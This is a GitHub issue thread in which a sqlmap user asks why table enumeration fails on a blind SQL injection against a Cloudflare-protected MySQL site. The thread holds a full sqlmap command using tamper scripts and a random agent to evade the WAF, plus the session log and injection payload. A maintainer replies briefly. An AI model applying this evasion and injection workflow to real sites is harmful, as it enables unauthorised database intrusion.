### ISSUE TITLE
[ERROR] unable to retrieve the table names for any database

### ISSUE THREAD

**Issue by pibil1** [sqlmapproject/sqlmap#2103]
Hey sqlmap developers how are you doing?

I need help please, I got a Blind SQL injection vulnerability,  run SqlMap and retrieved 1 database name however it didn't retrieve Information_schema, now it can't retrieve table or columns. I tried  manual but neither select or subselect are working on guessing table names.

Could anybody help me please?

Many thanks

I read many issues like this, here's my payload:

sqlmap.py -u "http://www.x.org/y.php?z=1" -p z -D a ---tables--identify-waf --level=5 --r
isk=3 -D a --tables --random-agent --tamper="between,randomcase,space2comment" -v 3 --random-agent --no-cast

[02:15:25] [INFO] using WAF scripts to detect backend WAF/IPS/IDS protection
[02:15:26] [INFO] heuristics detected web page charset 'windows-1252'
[02:15:27] [CRITICAL] WAF/IDS/IPS identified as 'CloudFlare Web Application Fire
wall (CloudFlare)'. Please consider usage of tamper scripts (option '--tamper')
are you sure that you want to continue with further target testing? [y/N] y
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: (GET)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY
clause
Payload: =1 RLIKE (SELECT (CASE WHEN (4062=4062) THEN 1 ELSE 0x28 END
))
---
[02:15:28] [INFO] testing MySQL
[02:15:29] [INFO] confirming MySQL
[02:15:30] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.4.44
back-end DBMS: MySQL >= 5.0.0
[02:15:30] [WARNING] running in a single-thread mode. Please consider usage of o
ption '--threads' for faster data retrieval
[02:15:30] [INFO] retrieved:
WARNING] unable to retrieve the number of tables for database ''
[02:16:39] [ERROR] unable to retrieve the table names for any database
do you want to use common table existence check? [y/N/q] y

After that none table is found

**Comment by stamparm** [comment]
You have been warned that there is a Cloudflare. Also, information_schema is the most common blacklisted keyword in protections. I believe that you are now aware of the situation. Cloaing this down
